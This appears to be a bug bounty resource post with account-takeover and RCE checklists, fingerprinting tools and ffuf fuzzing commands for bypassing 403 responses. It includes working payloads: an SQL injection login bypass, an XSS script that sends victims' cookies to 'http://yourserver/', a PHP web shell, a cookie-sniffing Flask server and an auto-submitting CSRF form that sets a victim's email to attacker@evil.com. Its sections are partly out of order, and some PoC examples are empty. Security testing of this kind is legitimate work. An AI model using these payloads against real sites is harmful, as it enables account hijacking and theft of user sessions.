Bugbounty Resources ππ
This post contains Bugbounty Resources to find vulnerabilities in web applications.
Account Takeover Checklist
-
login:
- check if you are able to brute force the password
- Test for OAuth misconfigurations
- check if you are able to bruteforce the login OTP
- check for JWT mesconfigurations
- Test for SQL injection to bypass authentication.
admin" or 1=1;--
- check if the application validates the OTP or Token
-
password reset:
- check if you are able to brute force the password reset OTP.
- test for token predectability.
- test for JWT misconfigurations.
- check if the password reset endpoint is vulnerable to IDOR.
- check if the password reset endpoint is vulnerable to Host Header injection.
- check if the password reset endpoint is leaking the token or OTP in the HTTP response.
- check if the application validates the OTP or Token.
- test for HTTP parameter Pollution (HPP).
-
XSS to Account Takeover:
- if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
- try to exfiltrate the cookies
- try to exfiltrate the Auth Token
- if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies PoC Example:
<script> /* this script will create a hidden <img> element when the browser tries to load the image the victim's cookies will be sent to your server */ var new_img = document.createElement('img'); new_img.src = "http://yourserver/" + document.cookie; new_img.style = 'display: none;' document.body.appendChild(new_img); </script>
-
CSRF to Account Takeover:
- check if the email update endpoint is vulnerable to CSRF
- check if the password update endpoint is vulnerable to CSRF
- PoC Example:
-
IDOR to Account Takerover
- checck if the email update endpoint is vulnerable to IDOR
- check if the password change endpoint is vulnerable to IDOR
- check if the password reset endpoint vulnerable to IDOR
-
subdomain takeover:
- first-order: check if you can takeover xyz.example.com, you can host any malicious code to steal users info or cookies
- PoC Example
- second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can takeover this domain, you can host any malicious javascript file and use it to steal users info or cookies
- PoC Example
-
Server Side Request Forgery (SSRF) to RCE:
- if you found an SSRF try to escalate it to RCE by interacting with internal services, to do this you can craft a Gopher payload to interact with services like MySQL, you can use Gopherus
-
File Upload to RCE:
- if you found an unrestricted file upload vulnerability try to upload a malicious file to get a reverse shell.
- PoC Example:
#php <?php system($_GET["cmd"]);?>
-
Dependency Confusion Attack:
- Search for packages that may be used internally by your target, then register a malicious public package with the same name, you can use confused tool.
-
Server Side Template Injection (SSTI) to RCE:
- if you found and SSTI you can exploit it with tplmap to get an RCE
-
SQL Injection To RCE:
- if you found an SQL injection, you can craft a special query to write an arbitrary file on the system, SQL Injection shell.
-
Latex Injection To RCE:
- if you found a web-based Latex Compiler, test If it is vulnerable to RCE, Latex to command execution.
-
Local File Inclusion (LFI) to RCE:
-
Insecure deserialization to RCE:
- check if the application is vulnerable to Insecure deserialization
- how to identify if the app is vulnerable:
- try to find out the language used to build the application.
- learn about the methods used to serialize and deserialize data in this language.
- by analyzing the data that comes from the application you can identify the method.
- try to craft a special payload to get and RCE
- check this cheatsheet
- Java Deserialization Scanner : a Burp Suite plugin to detect and exploit Java deserialization vulnerabilities.
-
wappaylzer
-
builtwith
-
httpx
- you can use
-web-server
and-tech-detect
options
#bash # a single domain echo example.com | httpx -web-server -tech-detect # a list of subdomins cat subdomains_list.txt | httpx -web-server -tech-detect httpx -l subdomains_list.txt -web-server -tech-detect
- you can use
-
Aquatone
- Aquatoneis a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
#bash cat hosts.txt | aquatone
-
nuclei
#bash nuclei -t ~/nuclei-templates -tags tech -u https://example.com -c 200
-
whatweb
#bash # a single host whatweb example.com # a list of hosts whatweb --input-file=hosts.txt
-
Error messages
- you can identify technologies via error messages, if a web app does not handle errors, and you sent malformed data to the web app, this data will cause an error, and this error may reveal the back-end technology.
#http POST / HTTP/1.1 Host: example.com User-Agent: curl/7.74.0 Accept: */* Content-type: application/json Content-Length: 8 {"test":d
- fuzzing http methods
#http METHOD /ENDPOINT HTTP/1.1 Host: example.com User-Agent: curl/7.74.0 Accept: */*
#bash ffuf -w http_methods.txt:METHOD -w endpoints.txt:ENDPOINT -request http_request.txt
- fuzzing http headers
#http GET /ENDPOINT HTTP/1.1 Host: example.com User-Agent: curl/7.74.0 Accept: */*
#bash ffuf -w http_headers_names.txt:NAME -w http_headers_values.txt:VALUE -w endpoints.txt:ENDPOINT -request http_request.txt -H "NAME: VALUE"
FFUF
- Path fuzzing
#bash ffuf -w 403_url_payloads.txt -u http://example.com/auth_pathFUZZ -fc 403,401,400
- HTTP Header Fuzzing
#bash ffuf -w 403_bypass_header_names.txt:HEADER -w 403_bypass_header_values.txt:VALUE -u http://example.com/auth_path -H "HEADER:VALUE" -fc 403,401,400
- Common HTTP Ports Fuzzing
#bash ffuf -w common-http-ports.txt:PORT -u http://example.com/auth_path -H "Host: example.com:PORT" -fc 403,401,400
- HTTP Methods Fuzzing
#bash ffuf -w http-methods.txt:METHOD -u http://example.com/auth_path -X "METHOD" -fc 403,401,400
- User Agent Fuzzing
#bash ffuf -w user-agents.txt:AGENT -u http://example.com/auth_path -H "User-Agent: AGENT" -fc 403,401,400
#python #!/usr/bin/python3 from flask import * app = Flask(__name__) @app.route('/') def cookie_sniffer(): for c_name, c_value in request.cookies.items(): print(c_name + ': ' + c_value) return 'Hello, world' if __name__ == '__main__': app.run(port=80)
//javascript user_cookies = { "cookies": document.cookie } var xhttp = new XMLHttpRequest(); xhttp.open("POST", "/store-cookies", true); xhttp.send(JSON.stringify(user_cookies));
Remote Code/Command Execution (RCE) Checklist
Web Applications Fingerprinting tools
403 - Bypass
nuclei
#bash nuclei -u http://example.com/auth_path/ -t 403-bypass-nuclei-templates -tags fuzz -timeout 10 -c 200 -v
Note : Add the slash symbol after the path whether it is a directory or file
Example:
Source:
Thanks for reading this post, if you like my work you can support by buying me a coffee. βοΈ
Read other posts
<html> <head> <title>CSRF PoC</title> </head> <body> <form name='attack' action='https://example.com/update-email' method='POST'> <input type="hidden" name="new_email" value="attacker@evil.com"> <input type="submit" name="submit" value="submit" hidden> </form> <script> document.attack.submit.click() </script> </body> </html>